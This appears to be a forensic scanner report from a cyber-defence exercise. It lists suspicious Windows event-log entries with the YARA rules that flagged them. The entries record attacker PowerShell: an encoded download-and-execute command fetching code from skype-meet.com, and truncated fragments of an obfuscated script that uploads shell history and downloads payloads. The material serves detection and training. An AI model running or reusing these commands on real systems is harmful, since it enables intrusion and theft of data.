{"_index": "cyberpolygon2024-mercurylark-win", "_id": "vC99tpEBNKI3r7qcTaQ6", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:05:38.726Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:05:40.649Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "action": "Network connection detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:05:36.931\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44455\nDestinationPortName: -"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "build": "17763.973", "version": "10.0", "kernel": "10.0.17763.97[...]domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:05:36.931", "ProcessId": 3348, "SourcePort": "53", "Protocol": "udp", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44455"}, "record_id": 1102500, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 12
Sep 10 18:22:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "wCpatpEBNKI3r7qcb0Ei", "_score": 1, "_source": {"@timestamp": "2024-09-03T05:27:42.677Z", "type": "wineventlog", "event": {"created": "2024-09-03T05:27:44.598Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 05:27:40.709\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.118.57\nDestinationHostname: -\nDestinationPort: 44475\nDestinationPortName: -"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "version": "10.0", "build"[...] 
"Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 05:27:40.709", "Protocol": "udp", "SourcePort": "53", "ProcessId": 3348, "DestinationIp": "10.24.118.57", "RuleName": "Alert,Metasploit", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44475", "Initiated": "false"}, "record_id": 1101250, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 13
Sep 10 18:26:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "Tkwht5EBNKI3r7qcAaOX", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:35.497Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:36.634Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\npowershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=\n\nScriptBlock ID: 5e65dd8a-2b6d-4b02-bcde-6034660f4bd4\nPath: "}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "verbose"}, "@version": "1", "host": {"name": "pc01243", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "id": "553fcd21-8750-45dd-a141-147a86db8821", "hostname": "pc01243", "mac": ["FA-16-3E-BD-EA-EF"], "architecture": "x86_64", "ip": ["fe80::cacd:8f18:a597:57e9", "10.24.69.74"]}, "tags": ["beats_input_codec_plain_applied"], "w[...]ype": "User", "identifier": "S-1-5-21-2213792943-3978625667-3641601853-1124", "domain": "MERCURYLARK"}, "event_data": {"MessageNumber": "1", "ScriptBlockText": "powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=", "ScriptBlockId": "5e65dd8a-2b6d-4b02-bcde-6034660f4bd4", "MessageTotal": "1"}, "record_id": 1587, "api": "wineventlog", "task": "Execute a Remote Command", "channel": "Microsoft-Windows-PowerShell/Operational", "version": 1, "computer_name": "pc01243.MercuryLark.corp", "provider_guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}", 
"process": {"pid": 2256, "thread": {"id": 4920}}}}}
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcA
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 14
Sep 10 18:26:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "wUwht5EBNKI3r7qcAaOa", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:35.333Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:35.611Z", "provider": "PowerShell", "kind": "event", "code": "400", "action": "Engine Lifecycle", "original": "Engine state is changed from None to Available. \n\nDetails: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.22621.3958\n\tHostId=d7d206e3-dd45-4c37-aa2f-54d7208533bc\n\tHostApplication=powershell.exe powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=\n\tEngineVersion=5.1.22621.3958\n\tRunspaceId=5c4adf39-7af9-465f-af10-9a96a7ba2393\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc01243", "os": {"platform": "windows", "name": "Windows 11 Pro", "version": "10.0", "build": "[...]e\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.22621.3958\n\tHostId=d7d206e3-dd45-4c37-aa2f-54d7208533bc\n\tHostApplication=powershell.exe powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=\n\tEngineVersion=5.1.22621.3958\n\tRunspaceId=5c4adf39-7af9-465f-af10-9a96a7ba2393\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="}, "record_id": 826, "api": "wineventlog", "task": "Engine Lifecycle", "channel": "Windows PowerShell", "computer_name": 
"pc01243.MercuryLark.corp", "process": {"pid": 2256}}}}
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcA
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 15
Sep 10 18:26:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "g0wht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:41.345Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:41.949Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "code": "4104", "action": "Execute a Remote Command", "original": "Creating Scriptblock text (1 of 1):\n{( [ChaR] ( [cOnVert]::tOInT16(( [StRINg]$_ ) ,16 ) )) }\n\nScriptBlock ID: 5edc77b8-a783-462a-bfc9-68719109b182\nPath: "}, "log": {"level": "verbose"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "553fcd21-8750-45dd-a141-147a86db8821", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "name": "pc01243", "hostname": "pc01243", "mac": ["FA-16-3E-BD-EA-EF"], "architecture": "x86_64", "ip": ["fe80::cacd:8f18:a597:57e9", "10.24.69.74"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4104", "activity_id": "{a31e3d22-fddf-0001-8ac0-1fa3dffdda01}", "opcode": "On create calls", "user": {"name": "j-taylor", "type": "User", "identifier": "S-1-5-21-2213792943-3978625667-3641601853-1124", "domain": "MERCURYLARK"}, "provider_name": "Microsoft-Windows-PowerShell", "event_data": {"MessageNumber": "1", "ScriptBlockText": "{( [ChaR] ( [cOnVert]::tOInT16(( [StRINg]$_ ) ,16 ) )) }", "ScriptBlockId": "5edc77b8-a783-462a-bfc9-68719109b182", "MessageTotal": "1"}, "record_id": 1608, "api": "wineventlog", "task": "Execute a Remote Command", "channel": "Microsoft-Windows-PowerShell/Operational", "version": 1, "computer_name": "pc01243.MercuryLark.corp", "provider_guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}", "process": {"pid": 1736, "thread": {"id": 8380}}}}}
SCORE:
79
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule Casing_Anomaly_Convert_PS / Detects casing anomaly in Convert PS statement
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • [cOnVert]
RULEDATE_1:
2018-10-09
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059, T1059_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule Casing_Anomaly_String_Statement / Detects suspicious casing of [string] statement
SUBSCORE_2:
60
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • [StRINg]
RULEDATE_2:
2018-12-30
TAGS_2:
ANOMALY, CASING, SCRIPT, SUSP, T1027
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 16
Sep 10 18:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "UEwht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:41.133Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:41.949Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\n.((gv '*MDr*').Name[3,11,2]-Join'') (-JOIN('24%55%52T4c%20_3dm20Y22_68_74m74n70Y3a%2fR2fm6dm69T63_72%6fT73n6fR66O74R2d%6f%66Y66Y69Y63O65n33Y35T36%2en63Y6f_6dm22O3b' -sPLiT'O'-spLit'm' -SplIt 'R' -SpLIT 'T' -spLIT'%' -SPlIt 'Y'-sPLIT 'n' -SPLIt'_'|FOreacH-oBJeCt {( [ChaR] ( [cOnVert]::tOInT16(( [StRINg]$_ ) ,16 ) )) }))\n\n$URL_d = $URL;\n\nfunction Send-Debug{\n param([Parameter(Position = 0)][String]$Info)\n $id = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(\"$env:COMPUTERNAME`:$env:USERDNSDOMAIN\\$e[...]rameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $Priv)\n $res = $NULL;\n whoami /priv | Select-String -Pattern $Priv | ForEach-Object {$_.Line -replace '^\\s+'} | ForEach-Object {echo ($_.tostring() -split \"\\W\")} | ForEach-Object {if($_.tostring() -eq \"\u0432\u043a\u043b\u044e\[...]])]\n param(\n [Parameter(Position = 0)][String]$Path,\n [Parameter(Position = 1)][String]$Name\n )\n process{\n if(Test-Path $[...]m.IO.File]::ReadAllBytes($PathToHistory));\n$id = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.Get[...]v:USERDNSDOMAIN\\$env:USERNAME\"))\nInvoke-WebRequest -Uri \"$URL/?id=h+$id\" -Method POST -Body $History;\n\nSV VAR1 ([type](\"sYsteM.IO.dIrECtorY\"));\n$DirPath = \"$env:TEMP\\\";\n(Dir variable:VAR1).value::\"CreateDirectory\"($DirPath);\nSend-Debug \"Dir created\";\n\nif($SeImpersonatePrivilege){$FilePath = $DirPath + \"taskhost.exe\"; $URL = $URL + \"/static/1/favicon.ico\";}\nif(-not $FilePath -and $AlwaysInstallElivated) {$FilePath = $DirPath + \"MsEdge.msi\"; $URL = $URL + \"/static/3/favicon.ico\";}\nif(-not $FilePath -and 
-not $
SCORE:
85
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule Casing_Anomaly_PowerShell_ForeEach / Detects casing anomalies in PowerShell function names
SUBSCORE_1:
70
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • FOreacH-oBJeCt
  • ForEach-Object
RULEDATE_1:
2022-07-11
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule Casing_Anomaly_Convert_PS / Detects casing anomaly in Convert PS statement
SUBSCORE_2:
65
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • [cOnVert]
  • [Convert]
RULEDATE_2:
2018-10-09
TAGS_2:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059, T1059_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 17
Sep 10 18:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "7Ewht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:38.353Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:39.711Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\niex (New-Object Net.WebClient).DownloadString(\"http://skype-meet.com/favicon.ico\")\n\nScriptBlock ID: a660ec12-b169-4148-a6b7-5fdec53249fa\nPath: "}, "log": {"level": "verbose"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc01243", "id": "553fcd21-8750-45dd-a141-147a86db8821", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "hostname": "pc01243", "mac": ["FA-16-3E-BD-EA-EF"], "architecture": "x86_64", "ip": ["fe80::cacd:8f18:a597:57e9", "10.24.69.74"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4104", "activity_id": "{a31e3d22-fddf-0001-6cc0-1fa3dffdda01}", "opcode": "On create calls", "user": {"name": "j-taylor", "type": "User", "identifier": "S-1-5-21-2213792943-3978625667-3641601853-1124", "domain": "MERCURYLARK"}, "provider_name": "Microsoft-Windows-PowerShell", "event_data": {"MessageNumber": "1", "ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString(\"http://skype-meet.com/favicon.ico\")", "ScriptBlockId": "a660ec12-b169-4148-a6b7-5fdec53249fa", "MessageTotal": "1"}, "record_id": 1592, "api": "wineventlog", "task": "Execute a Remote Command", "channel": "Microsoft-Windows-PowerShell/Operational", "version": 1, "computer_name": "pc01243.MercuryLark.corp", "provider_guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}", "process": {"pid": 1736, "thread": {"id": 8380}}}}}
SCORE:
83
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule SUSP_PS1_Pattern_Combo_Feb22_1 / Detects suspicious PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iex (New-Object Net.WebClient).DownloadString
RULEDATE_1:
2022-02-28
TAGS_1:
ANOMALY, SCRIPT, SUSP, T1059_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_From_Download_Dec22_1 / Detects command lines or scripts making use of AstroBWT miner (a Monero crypto coin miner)
SUBSCORE_2:
65
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • iex (New-Object
  • ).Download
RULEDATE_2:
2022-12-28
TAGS_2:
SCRIPT, SUSP, T1059_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
2
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 18
Sep 10 18:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "7Uwht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:40.261Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:41.943Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\n. ( $pSHOMe[4]+$pSHOmE[30]+'x') ( -joIN [CHar[]] (46, 40 , 40 ,103,118 , 32,39,42 ,77 , 68,114,42 , 39 , 41 , 46 ,78 , 97,109, 101, 91,51, 44 , 49,49 , 44 , 50,93, 45 ,74, 111,105 ,110,39,39 ,41, 32, 40 ,45 , 74,79 , 73, 78 , 40, 39, 50 ,52 , 37 , 53,53 , 37,53 ,50,84 , 52 ,99, 37,50,48,95, 51 ,100, 109,50, 48, 89, 50, 50 , 95 ,54 , 56, 95 ,55 ,52,109,55 ,52 , 110 ,55 , 48 , 89, 51,97 , 37 , 50, 102,82 , 50 ,102 , 109 ,54,100, 109,54 ,57 , 84, 54 ,51 , 95 ,55,50, 37 , 54,102, 84 ,55 , 51,110,54,102 , 82 , 54 ,54 , 79 ,55 , 52, 82, 50,100 , 37 ,54 ,102 ,37,54,54,89 ,54 ,54 , 89,54 ,57, 89 ,54,51, 79, 54 ,53,110,51 , 51 , 89,51,53 , 84, 51 ,54,37,50,101, 110 ,54, 51 , 89 ,54 , 102 , 95,[...],99, 116, 105,111, 110 , 32,67 ,104 ,101 , 99 , 107 , 45, 80 ,114,105 , 118,32,123,13,10 ,32 ,32,32 , 32 , 91 , 67 ,109 , 100,108 ,101 ,116 ,66,105,110, 100, 105, 110,103, 40,41 ,93, 91, 79, 117,116, 112 , 117, 116 , 84 ,121 ,112 , 101 , 40,91,98, 111 ,111,108 ,93 ,41 ,93, 13 , 10, 32 ,32 , 32,32 ,112, 97, 114 ,97, 109 , 32 